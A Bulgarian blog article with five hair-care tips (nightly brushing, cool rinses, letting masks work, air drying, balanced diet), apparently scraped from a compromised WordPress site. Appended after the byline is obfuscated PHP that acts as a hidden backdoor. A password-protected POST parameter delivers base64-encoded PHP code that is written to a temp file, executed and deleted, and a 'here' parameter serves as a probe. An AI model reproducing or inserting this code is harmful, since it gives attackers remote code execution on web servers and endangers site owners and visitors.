5 безпогрешни стратегии за възстановяване на косата | Косопад

5 безпогрешни стратегии за възстановяване на косата

kosata-ne-raste

Преса на 200 градуса, сешоари през лятото, обезцветяване на косата и пр: ако се разпознавате в този профил, със сигурност малтретирате косата си.

Жените сякаш сме родени да не сме доволни от естествените си косите. Брюнетките искат да стават блондинки, русото да е още по- русо, иска да изправите къдравата си коса и обратното. Твърдо обаче не искате да си подстригвате връхчетата. Драмата е неизбежна.

Предлагаме ви обаче няколко ефективни съвета за възстановяване на косата ви.

1. Решете я всяка вечер. Обръщайте внимание на косата си преди да си легнете. Ресането на косата с четка стимулира кръвообращението и благоприятства достигането на вещества но фоликулите. Това стимулира растежа на косата.

kosopad-sledi

2. Внимавайте с температурата на косата. Когато си миете косата, последното миене задължително да е със студена вода. Действа също толкова стимулиращо, колкото и ресането с четка и затварянето на кутикулата. Това придава повече блясък на косата. Винаги мийте косата в топла вода, а не с гореща. Студената вода не измива достатъчно добре мазнините.

3. Маска и балсам – само в правилното време. Дали ги оставяте да действат, колкото е необходимо? Обикновено бързаме и мием, преди още активните съставки да са попаднали в косата и да изпълнят възстановяваща си функция.

4. Сушете винаги на въздух. Оставяйте косата си да съхне по естествен начин, винаги когато ви е възможно. Прекаляването със сешоар дехидратира силно косата. Така че се нуждае от глътка въздух от време на време.

5. Грижете се за храненето си. Начинът на хранене се отразява на косата ни. За да я поддържаме здрава, трябва да се храним балансирано.

06. юли 2015 19:11:32 от Надя Колева
Категории: Косопад – Статии | Етикети: , , | 4 коментари

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}